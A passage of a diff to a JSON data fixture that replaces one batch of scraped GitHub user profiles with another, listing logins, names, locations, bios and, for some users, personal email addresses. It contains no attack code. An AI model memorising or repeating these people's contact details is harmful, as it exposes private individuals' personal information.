"2024-09-22T19:29:15.084Z", "name": "", - "login": "HQPhamOrcl", + "login": "khoelldobler", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/132680625?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/95409862?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-05-05T13:55:06Z", - "updated_at": "2024-09-09T15:06:39Z", - "node_id": "U_kgDOB-iLsQ", + "public_repositories_count": 1, + "created_at": "2021-12-02T09:05:53Z", + "updated_at": "2021-12-02T09:05:53Z", + "node_id": "U_kgDOBa_Wxg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413003,24 +671652,24 @@ }, { "model": "github.user", - "pk": 2111, + "pk": 7430, "fields": { - "nest_created_at": "2024-09-12T00:37:08.603Z", - "nest_updated_at": "2024-09-18T19:03:54.732Z", + "nest_created_at": "2024-09-22T08:44:32.794Z", + "nest_updated_at": "2024-09-22T19:29:15.397Z", "name": "", - "login": "livingsocial", + "login": "kauppine", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/448881?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/24810630?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 73, - "created_at": "2010-10-21T21:38:36Z", - "updated_at": "2016-11-01T20:14:05Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjQ0ODg4MQ==", + "public_gists_count": 2, + "public_repositories_count": 11, + "created_at": "2016-12-28T13:30:25Z", + "updated_at": "2024-05-20T05:22:21Z", + "node_id": "MDQ6VXNlcjI0ODEwNjMw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413028,24 +671677,24 @@ }, { "model": "github.user", - "pk": 2112, + "pk": 7431, "fields": { - "nest_created_at": "2024-09-12T00:37:12.643Z", - "nest_updated_at": "2024-09-18T19:03:57.273Z", - "name": "Jad Joubair", - "login": "jadjbr", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/48275583?v=4", - "company": "", - "location": "Barcelona", + "nest_created_at": "2024-09-22T08:44:33.139Z", + "nest_updated_at": "2024-09-22T19:29:15.704Z", + "name": "Ken Geis", + "login": "kgeis", + "email": "geis.ken@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2237299?v=4", + "company": "@UCB-RAC ", + "location": "Berkeley, CA", "collaborators_count": 0, - "following_count": 3, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-03-06T07:54:01Z", - "updated_at": "2022-01-29T19:10:29Z", - "node_id": "MDQ6VXNlcjQ4Mjc1NTgz", + "following_count": 1, + "followers_count": 16, + "public_gists_count": 1, + "public_repositories_count": 152, + "created_at": "2012-08-28T21:36:54Z", + "updated_at": "2024-03-01T23:56:43Z", + "node_id": "MDQ6VXNlcjIyMzcyOTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413053,49 +671702,49 @@ }, { "model": "github.user", - "pk": 2113, + "pk": 7432, "fields": { - "nest_created_at": "2024-09-12T00:37:13.490Z", - "nest_updated_at": "2024-09-12T00:37:13.490Z", - "name": "Thomas Cherry", - "login": "jceaser", - "email": "thomas.cherry@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6968137?v=4", - "company": "thomascherry.name", - "location": "Baltimore, Md", + "nest_created_at": "2024-09-22T08:44:33.765Z", + "nest_updated_at": "2024-09-22T19:29:16.331Z", + "name": "Jan Gehring", + "login": "krimdomu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/388436?v=4", + "company": "inovex", + "location": "Germany", "collaborators_count": 0, - "following_count": 20, - "followers_count": 8, - "public_gists_count": 1, - "public_repositories_count": 49, - "created_at": "2014-03-16T18:23:16Z", - "updated_at": "2024-07-27T03:11:11Z", - "node_id": "MDQ6VXNlcjY5NjgxMzc=", - "bio": "This is my personal repository but you might find some things related to my work at NASA.\r\n", + "following_count": 15, + "followers_count": 73, + "public_gists_count": 28, + "public_repositories_count": 84, + "created_at": "2010-09-05T15:17:03Z", + "updated_at": "2024-03-12T09:51:43Z", + "node_id": "MDQ6VXNlcjM4ODQzNg==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2114, + "pk": 7433, "fields": { - "nest_created_at": "2024-09-12T00:37:14.348Z", - "nest_updated_at": "2024-09-12T00:37:14.348Z", - "name": "", - "login": "wakil1", + "nest_created_at": "2024-09-22T08:44:34.085Z", + "nest_updated_at": "2024-09-22T19:29:16.647Z", + "name": "Kristian Mört", + "login": "kmort89", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59300535?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2327167?v=4", + "company": "PHZ.fi", + "location": "Finland", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2019-12-28T03:10:17Z", - "updated_at": "2024-08-18T16:07:15Z", - "node_id": "MDQ6VXNlcjU5MzAwNTM1", + "public_repositories_count": 1, + "created_at": "2012-09-11T20:22:43Z", + "updated_at": "2024-02-12T11:59:48Z", + "node_id": "MDQ6VXNlcjIzMjcxNjc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413103,299 +671752,299 @@ }, { "model": "github.user", - "pk": 2115, + "pk": 7434, "fields": { - "nest_created_at": "2024-09-12T00:37:21.797Z", - "nest_updated_at": "2024-09-18T19:04:03.277Z", - "name": "Nikola Milosevic", - "login": "nikolamilosevic86", + "nest_created_at": "2024-09-22T08:44:34.725Z", + "nest_updated_at": "2024-09-22T19:29:17.268Z", + "name": "Laurent Hubert-Vaillant", + "login": "lrnthbrt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5192295?v=4", - "company": "Bayer Pharma R&D", - "location": "Belin, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/20278667?v=4", + "company": "Wallix", + "location": "Rennes, France", "collaborators_count": 0, - "following_count": 11, - "followers_count": 98, - "public_gists_count": 2, - "public_repositories_count": 52, - "created_at": "2013-08-08T18:49:20Z", - "updated_at": "2024-09-13T18:40:15Z", - "node_id": "MDQ6VXNlcjUxOTIyOTU=", - "bio": "Text mining & NLP & Machine learning & cyber-security researcher", - "is_hireable": true, - "twitter_username": "text_miner" + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2016-07-04T08:28:15Z", + "updated_at": "2023-10-03T07:36:46Z", + "node_id": "MDQ6VXNlcjIwMjc4NjY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 2116, + "pk": 7435, "fields": { - "nest_created_at": "2024-09-12T00:37:32.436Z", - "nest_updated_at": "2024-09-12T00:37:34.935Z", - "name": "Abhishek J M", - "login": "abhi-r3v0", - "email": "jmabhishek4@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/9742431?v=4", + "nest_created_at": "2024-09-22T08:44:35.130Z", + "nest_updated_at": "2024-09-22T19:29:17.589Z", + "name": "Loris Reiff", + "login": "Liblor", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4940804?v=4", "company": "", - "location": "Mysuru, India", + "location": "Switzerland", "collaborators_count": 0, - "following_count": 50, - "followers_count": 130, - "public_gists_count": 0, - "public_repositories_count": 77, - "created_at": "2014-11-14T10:33:20Z", - "updated_at": "2024-03-27T04:11:22Z", - "node_id": "MDQ6VXNlcjk3NDI0MzE=", - "bio": "Lead Security Engineer | Security Research & Training", + "following_count": 28, + "followers_count": 33, + "public_gists_count": 9, + "public_repositories_count": 32, + "created_at": "2013-07-04T13:30:34Z", + "updated_at": "2024-08-18T07:50:45Z", + "node_id": "MDQ6VXNlcjQ5NDA4MDQ=", + "bio": "", "is_hireable": false, - "twitter_username": "HawkSpawn" + "twitter_username": "liblor" } }, { "model": "github.user", - "pk": 2117, + "pk": 7436, "fields": { - "nest_created_at": "2024-09-12T00:37:37.882Z", - "nest_updated_at": "2024-09-12T00:37:37.883Z", - "name": "Wesley A. Gahr", - "login": "voider1", - "email": "wesley.gahr@me.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6877671?v=4", + "nest_created_at": "2024-09-22T08:44:35.442Z", + "nest_updated_at": "2024-09-22T19:29:17.907Z", + "name": "", + "login": "lmo-wt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89196883?v=4", "company": "", - "location": "The Netherlands", + "location": "", "collaborators_count": 0, - "following_count": 20, - "followers_count": 18, - "public_gists_count": 4, - "public_repositories_count": 20, - "created_at": "2014-03-06T22:16:42Z", - "updated_at": "2024-08-29T08:27:13Z", - "node_id": "MDQ6VXNlcjY4Nzc2NzE=", - "bio": "Data Scientist @ ThreatFabric | Data Science & AI BSc @ Leiden University", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-08-19T11:16:59Z", + "updated_at": "2024-09-22T16:51:49Z", + "node_id": "MDQ6VXNlcjg5MTk2ODgz", + "bio": "", "is_hireable": false, - "twitter_username": "wesley_gahr" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2118, + "pk": 7437, "fields": { - "nest_created_at": "2024-09-12T00:37:38.702Z", - "nest_updated_at": "2024-09-12T00:37:38.702Z", - "name": "Loyd Jayme", - "login": "loydjayme25", + "nest_created_at": "2024-09-22T08:44:35.756Z", + "nest_updated_at": "2024-09-22T19:29:18.215Z", + "name": "Georg Ragaller", + "login": "ragaller", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37318022?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/462676?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 11, - "followers_count": 5, + "following_count": 1, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2018-03-13T02:13:53Z", - "updated_at": "2019-05-02T12:53:04Z", - "node_id": "MDQ6VXNlcjM3MzE4MDIy", - "bio": "Aiming High !\r\n\r\nloydjayme1996@gmail.com\r\n\r\nshankz.akagami@yahoo.com.ph", + "public_repositories_count": 5, + "created_at": "2010-11-01T13:05:56Z", + "updated_at": "2024-09-06T16:45:06Z", + "node_id": "MDQ6VXNlcjQ2MjY3Ng==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2119, + "pk": 7438, "fields": { - "nest_created_at": "2024-09-12T00:37:43.647Z", - "nest_updated_at": "2024-09-18T19:08:16.755Z", - "name": "OWASP Juice Shop", - "login": "juice-shop", - "email": "github.com@owasp-juice.shop", - "avatar_url": "https://avatars.githubusercontent.com/u/83415759?v=4", + "nest_created_at": "2024-09-22T08:44:36.068Z", + "nest_updated_at": "2024-09-22T19:29:18.528Z", + "name": "Glen Vermeylen", + "login": "glever", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6237313?v=4", "company": "", - "location": "", + "location": "Belgium", "collaborators_count": 0, "following_count": 0, - "followers_count": 270, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2021-04-29T15:12:19Z", - "updated_at": "2024-09-01T11:32:49Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjgzNDE1NzU5", - "bio": "Insecure web application for security trainings, awareness demos, CTFs and as a guinea pig for security tools", + "followers_count": 2, + "public_gists_count": 4, + "public_repositories_count": 4, + "created_at": "2013-12-21T16:43:40Z", + "updated_at": "2022-12-01T10:03:08Z", + "node_id": "MDQ6VXNlcjYyMzczMTM=", + "bio": "Java Programmer", "is_hireable": false, - "twitter_username": "owasp_juiceshop" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2120, + "pk": 7439, "fields": { - "nest_created_at": "2024-09-12T00:37:46.807Z", - "nest_updated_at": "2024-09-12T00:37:46.807Z", - "name": "Hugo Pacheco", - "login": "hpacheco", - "email": "hpacheco@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/142078?v=4", + "nest_created_at": "2024-09-22T08:44:36.380Z", + "nest_updated_at": "2024-09-22T19:29:18.849Z", + "name": "Gregor Dschung", + "login": "chkpnt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1956979?v=4", "company": "", - "location": "Portugal", + "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 52, "followers_count": 15, - "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2009-10-20T11:14:46Z", - "updated_at": "2024-08-28T11:20:32Z", - "node_id": "MDQ6VXNlcjE0MjA3OA==", + "public_gists_count": 5, + "public_repositories_count": 107, + "created_at": "2012-07-11T14:18:48Z", + "updated_at": "2024-08-26T17:46:55Z", + "node_id": "MDQ6VXNlcjE5NTY5Nzk=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "chkpnt" } }, { "model": "github.user", - "pk": 2121, + "pk": 7440, "fields": { - "nest_created_at": "2024-09-12T00:37:49.796Z", - "nest_updated_at": "2024-09-12T00:37:49.796Z", - "name": "Shubham Palriwala", - "login": "ShubhamPalriwala", - "email": "spalriwalau@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/55556994?v=4", + "nest_created_at": "2024-09-22T08:44:36.695Z", + "nest_updated_at": "2024-09-22T19:29:19.203Z", + "name": "Grzegorz Dąbrowski", + "login": "dabal", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/602618?v=4", "company": "", - "location": "", + "location": "Warszawa", "collaborators_count": 0, - "following_count": 37, - "followers_count": 197, - "public_gists_count": 0, - "public_repositories_count": 83, - "created_at": "2019-09-19T18:47:44Z", - "updated_at": "2024-08-19T11:52:19Z", - "node_id": "MDQ6VXNlcjU1NTU2OTk0", - "bio": "GSoC @OWASP @juice-shop '22 | GSoD @OpenMined '22 | Github Extern @Dhiway '22 | LFX @CNCF @Kyverno '21 | SoB @bitcoin '21 | Certified Ethical Hacker v11", + "following_count": 2, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 18, + "created_at": "2011-02-06T00:08:00Z", + "updated_at": "2024-04-15T21:43:06Z", + "node_id": "MDQ6VXNlcjYwMjYxOA==", + "bio": "", "is_hireable": true, - "twitter_username": "ShubhamInTech" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2122, + "pk": 7441, "fields": { - "nest_created_at": "2024-09-12T00:37:53.146Z", - "nest_updated_at": "2024-09-13T05:07:31.529Z", - "name": "Martina Kraus", - "login": "martinakraus", - "email": "kraus.martina.m@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6086902?v=4", - "company": "Kraus IT Consulting", - "location": "Karlsruhe", + "nest_created_at": "2024-09-22T08:44:37.019Z", + "nest_updated_at": "2024-09-22T19:29:19.514Z", + "name": "Guido Grazioli", + "login": "guidograzioli", + "email": "guido.grazioli@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/849495?v=4", + "company": "Red Hat", + "location": "Italy", "collaborators_count": 0, - "following_count": 39, - "followers_count": 129, - "public_gists_count": 1, - "public_repositories_count": 31, - "created_at": "2013-12-02T15:07:03Z", - "updated_at": "2024-08-19T15:49:23Z", - "node_id": "MDQ6VXNlcjYwODY5MDI=", - "bio": "Application Security Engineer@Kraus IT Consulting\r\n\r\nGoogle Developer Expert in Angular \r\n@ngHeidelberg, @AngularGirls", + "following_count": 5, + "followers_count": 19, + "public_gists_count": 5, + "public_repositories_count": 78, + "created_at": "2011-06-14T13:54:45Z", + "updated_at": "2024-09-20T14:27:50Z", + "node_id": "MDQ6VXNlcjg0OTQ5NQ==", + "bio": "Senior Software Engineer at Red Hat", "is_hireable": false, - "twitter_username": "MartinaKraus11" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2123, + "pk": 7442, "fields": { - "nest_created_at": "2024-09-12T00:37:53.547Z", - "nest_updated_at": "2024-09-13T05:07:31.848Z", - "name": "Thomas Phillip Breland", - "login": "thomasbreland", - "email": "thomas@breland.tech", - "avatar_url": "https://avatars.githubusercontent.com/u/17169643?v=4", + "nest_created_at": "2024-09-22T08:44:37.341Z", + "nest_updated_at": "2024-09-22T19:29:19.838Z", + "name": "Guido", + "login": "guidoschreuder", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14310360?v=4", "company": "", - "location": "Georgia, USA", + "location": "", "collaborators_count": 0, - "following_count": 6, + "following_count": 0, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2016-02-10T23:54:28Z", - "updated_at": "2024-08-14T04:24:11Z", - "node_id": "MDQ6VXNlcjE3MTY5NjQz", - "bio": "I like code.", + "public_repositories_count": 11, + "created_at": "2015-09-16T09:48:52Z", + "updated_at": "2024-09-20T14:10:57Z", + "node_id": "MDQ6VXNlcjE0MzEwMzYw", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2124, + "pk": 7443, "fields": { - "nest_created_at": "2024-09-12T00:37:56.527Z", - "nest_updated_at": "2024-09-16T22:30:21.378Z", - "name": "Thomas Reinecke", - "login": "ThReinecke", + "nest_created_at": "2024-09-22T08:44:37.684Z", + "nest_updated_at": "2024-09-22T19:29:20.151Z", + "name": "", + "login": "HSZemi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/126483857?v=4", - "company": "Johnson & Johnson", + "avatar_url": "https://avatars.githubusercontent.com/u/3027817?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 38, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2023-02-27T13:34:20Z", - "updated_at": "2024-08-06T12:09:22Z", - "node_id": "U_kgDOB4n9kQ", - "bio": "Software & Security Engineer", + "public_repositories_count": 77, + "created_at": "2012-12-12T18:59:43Z", + "updated_at": "2024-08-28T11:25:14Z", + "node_id": "MDQ6VXNlcjMwMjc4MTc=", + "bio": "Til bardaga.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2125, + "pk": 7444, "fields": { - "nest_created_at": "2024-09-12T00:37:59.956Z", - "nest_updated_at": "2024-09-12T00:37:59.956Z", - "name": "Anton Jeppsson", - "login": "ontanj", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/28560602?v=4", - "company": "Neodev", - "location": "Malmö, Sweden", + "nest_created_at": "2024-09-22T08:44:37.997Z", + "nest_updated_at": "2024-09-22T19:29:20.460Z", + "name": "Ashley", + "login": "Hacktix", + "email": "me@hacktix.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/26490144?v=4", + "company": "", + "location": "Probably at Home", "collaborators_count": 0, - "following_count": 6, - "followers_count": 7, + "following_count": 1, + "followers_count": 43, "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2017-05-09T09:23:58Z", - "updated_at": "2024-09-02T08:16:15Z", - "node_id": "MDQ6VXNlcjI4NTYwNjAy", - "bio": "Sotware developer at Neodev | Tuba player at Banda Lunda", + "public_repositories_count": 41, + "created_at": "2017-03-17T17:43:33Z", + "updated_at": "2024-09-22T08:52:54Z", + "node_id": "MDQ6VXNlcjI2NDkwMTQ0", + "bio": "Using equal measures of skill and luck to flip magical computer switches in just the right way", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2126, + "pk": 7445, "fields": { - "nest_created_at": "2024-09-12T00:38:02.500Z", - "nest_updated_at": "2024-09-12T00:38:02.500Z", + "nest_created_at": "2024-09-22T08:44:38.312Z", + "nest_updated_at": "2024-09-22T19:29:20.777Z", "name": "", - "login": "fauna654", + "login": "Helpstone", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/175965380?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7443545?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-07-18T16:06:21Z", - "updated_at": "2024-08-26T07:26:56Z", - "node_id": "U_kgDOCn0ExA", + "public_repositories_count": 4, + "created_at": "2014-04-29T20:33:38Z", + "updated_at": "2024-06-13T14:45:17Z", + "node_id": "MDQ6VXNlcjc0NDM1NDU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413403,24 +672052,24 @@ }, { "model": "github.user", - "pk": 2127, + "pk": 7446, "fields": { - "nest_created_at": "2024-09-12T00:41:56.790Z", - "nest_updated_at": "2024-09-12T00:41:56.791Z", - "name": "Jannik Steinmann", - "login": "DerGut", + "nest_created_at": "2024-09-22T08:44:38.632Z", + "nest_updated_at": "2024-09-22T19:29:21.094Z", + "name": "Henning Pöttker", + "login": "hpoettker", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12832754?v=4", - "company": "@DataDog", - "location": "Berlin", + "avatar_url": "https://avatars.githubusercontent.com/u/25299532?v=4", + "company": "", + "location": "Frankfurt, Germany", "collaborators_count": 0, - "following_count": 19, - "followers_count": 15, - "public_gists_count": 3, - "public_repositories_count": 39, - "created_at": "2015-06-10T16:08:37Z", - "updated_at": "2024-09-02T11:29:23Z", - "node_id": "MDQ6VXNlcjEyODMyNzU0", + "following_count": 1, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2017-01-23T13:23:29Z", + "updated_at": "2023-10-11T15:56:42Z", + "node_id": "MDQ6VXNlcjI1Mjk5NTMy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413428,74 +672077,74 @@ }, { "model": "github.user", - "pk": 2128, + "pk": 7447, "fields": { - "nest_created_at": "2024-09-12T00:41:59.659Z", - "nest_updated_at": "2024-09-12T00:41:59.659Z", - "name": "hx", - "login": "skandix", - "email": "skandix@datapor.no", - "avatar_url": "https://avatars.githubusercontent.com/u/2757177?v=4", - "company": "@uiano", - "location": "", + "nest_created_at": "2024-09-22T08:44:39.953Z", + "nest_updated_at": "2024-09-22T19:29:22.341Z", + "name": "Isaac Whitfield", + "login": "whitfin", + "email": "iw@whitfin.io", + "avatar_url": "https://avatars.githubusercontent.com/u/5376378?v=4", + "company": "@latentai ", + "location": "San Jose, CA", "collaborators_count": 0, - "following_count": 389, - "followers_count": 120, - "public_gists_count": 6, - "public_repositories_count": 28, - "created_at": "2012-11-09T07:51:10Z", - "updated_at": "2024-09-09T07:01:28Z", - "node_id": "MDQ6VXNlcjI3NTcxNzc=", - "bio": "Living in a Paradoxical level-crossing feedback loop. 🏳️‍🌈\r\n\r\nStaff Engineer @uiano \r\nfreelance audio tech", + "following_count": 48, + "followers_count": 198, + "public_gists_count": 17, + "public_repositories_count": 213, + "created_at": "2013-09-03T20:30:48Z", + "updated_at": "2024-09-17T21:33:33Z", + "node_id": "MDQ6VXNlcjUzNzYzNzg=", + "bio": "Fan of all things automated, OSS when applicable :)\r\n\r\nIntelligence wanes without practice!", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2129, + "pk": 7448, "fields": { - "nest_created_at": "2024-09-12T00:42:01.817Z", - "nest_updated_at": "2024-09-12T00:42:01.817Z", - "name": "Robin Wood", - "login": "digininja", + "nest_created_at": "2024-09-22T08:44:41.239Z", + "nest_updated_at": "2024-09-22T19:29:23.594Z", + "name": "Jan S.", + "login": "jpstotz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/117081?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/924885?v=4", "company": "", - "location": "UK", + "location": "Germany", "collaborators_count": 0, "following_count": 0, - "followers_count": 1271, - "public_gists_count": 13, - "public_repositories_count": 60, - "created_at": "2009-08-19T15:17:18Z", - "updated_at": "2024-03-08T11:14:46Z", - "node_id": "MDQ6VXNlcjExNzA4MQ==", - "bio": "Hacker, coder, climber, runner. Co-founder of the SteelCon conference.", + "followers_count": 33, + "public_gists_count": 4, + "public_repositories_count": 65, + "created_at": "2011-07-19T09:01:17Z", + "updated_at": "2024-09-09T08:28:36Z", + "node_id": "MDQ6VXNlcjkyNDg4NQ==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2130, + "pk": 7449, "fields": { - "nest_created_at": "2024-09-12T00:42:02.635Z", - "nest_updated_at": "2024-09-12T00:42:02.635Z", - "name": "", - "login": "jvmdc", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/109624469?v=4", + "nest_created_at": "2024-09-22T08:44:41.550Z", + "nest_updated_at": "2024-09-22T19:29:23.897Z", + "name": "Jan Tošovský", + "login": "jan-tosovsky-cz", + "email": "jan.tosovsky.cz@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3907898?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2022-07-19T19:03:29Z", - "updated_at": "2024-05-13T10:31:41Z", - "node_id": "U_kgDOBoi8lQ", + "followers_count": 3, + "public_gists_count": 2, + "public_repositories_count": 19, + "created_at": "2013-03-19T09:07:48Z", + "updated_at": "2024-06-21T17:07:43Z", + "node_id": "MDQ6VXNlcjM5MDc4OTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413503,24 +672152,24 @@ }, { "model": "github.user", - "pk": 2131, + "pk": 7450, "fields": { - "nest_created_at": "2024-09-12T00:42:03.512Z", - "nest_updated_at": "2024-09-13T05:07:42.999Z", - "name": "Nicolò Picasso", - "login": "nicolopicasso", + "nest_created_at": "2024-09-22T08:44:41.861Z", + "nest_updated_at": "2024-09-22T19:29:24.216Z", + "name": "Janosch Schwalm", + "login": "YoshiMan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/110613903?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3296088?v=4", "company": "", - "location": "", + "location": "Germany, Kassel", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 9, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2022-08-04T13:38:02Z", - "updated_at": "2023-12-06T16:39:08Z", - "node_id": "U_kgDOBpfVjw", + "public_repositories_count": 10, + "created_at": "2013-01-17T12:47:06Z", + "updated_at": "2024-06-11T05:29:23Z", + "node_id": "MDQ6VXNlcjMyOTYwODg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413528,39 +672177,39 @@ }, { "model": "github.user", - "pk": 2132, + "pk": 7451, "fields": { - "nest_created_at": "2024-09-12T00:42:05.589Z", - "nest_updated_at": "2024-09-12T00:42:05.589Z", - "name": "Ak", - "login": "Ak-wa", + "nest_created_at": "2024-09-22T08:44:42.197Z", + "nest_updated_at": "2024-09-22T19:29:24.526Z", + "name": "Jason Dillon", + "login": "jdillon", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44728139?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20114?v=4", "company": "", - "location": "Germany", + "location": "California, USA", "collaborators_count": 0, - "following_count": 5, - "followers_count": 26, - "public_gists_count": 1, - "public_repositories_count": 33, - "created_at": "2018-11-03T14:24:35Z", - "updated_at": "2024-05-10T07:02:21Z", - "node_id": "MDQ6VXNlcjQ0NzI4MTM5", - "bio": "Penetration Tester | OSCP eCPPT certified\r\nツ", + "following_count": 13, + "followers_count": 51, + "public_gists_count": 0, + "public_repositories_count": 30, + "created_at": "2008-08-09T08:32:55Z", + "updated_at": "2024-07-09T18:29:10Z", + "node_id": "MDQ6VXNlcjIwMTE0", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2133, + "pk": 7452, "fields": { - "nest_created_at": "2024-09-12T00:42:06.819Z", - "nest_updated_at": "2024-09-12T00:42:06.819Z", + "nest_created_at": "2024-09-22T08:44:42.552Z", + "nest_updated_at": "2024-09-22T19:29:24.836Z", "name": "", - "login": "bastien-reinhardt", + "login": "AnalystPlatform", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11425000?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8369657?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -413568,9 +672217,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2015-03-11T13:50:02Z", - "updated_at": "2024-05-31T08:00:12Z", - "node_id": "MDQ6VXNlcjExNDI1MDAw", + "created_at": "2014-08-06T02:42:15Z", + "updated_at": "2016-02-27T18:13:32Z", + "node_id": "MDQ6VXNlcjgzNjk2NTc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413578,99 +672227,99 @@ }, { "model": "github.user", - "pk": 2134, + "pk": 7453, "fields": { - "nest_created_at": "2024-09-12T00:42:08.131Z", - "nest_updated_at": "2024-09-12T00:42:08.131Z", - "name": "", - "login": "stuebingerb", + "nest_created_at": "2024-09-22T08:44:47.099Z", + "nest_updated_at": "2024-09-22T19:29:29.381Z", + "name": "Doug Knight", + "login": "dgknght", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41049452?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5429848?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 10, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2018-07-10T08:10:22Z", - "updated_at": "2024-07-29T18:05:58Z", - "node_id": "MDQ6VXNlcjQxMDQ5NDUy", - "bio": "Certified Rockstar Developer\r\nhttps://codewithrockstar.com/", + "followers_count": 11, + "public_gists_count": 2, + "public_repositories_count": 26, + "created_at": "2013-09-10T18:46:34Z", + "updated_at": "2024-09-03T00:12:38Z", + "node_id": "MDQ6VXNlcjU0Mjk4NDg=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2135, + "pk": 7454, "fields": { - "nest_created_at": "2024-09-12T01:08:08.819Z", - "nest_updated_at": "2024-09-12T01:08:08.819Z", - "name": "", - "login": "mpp-anasa", + "nest_created_at": 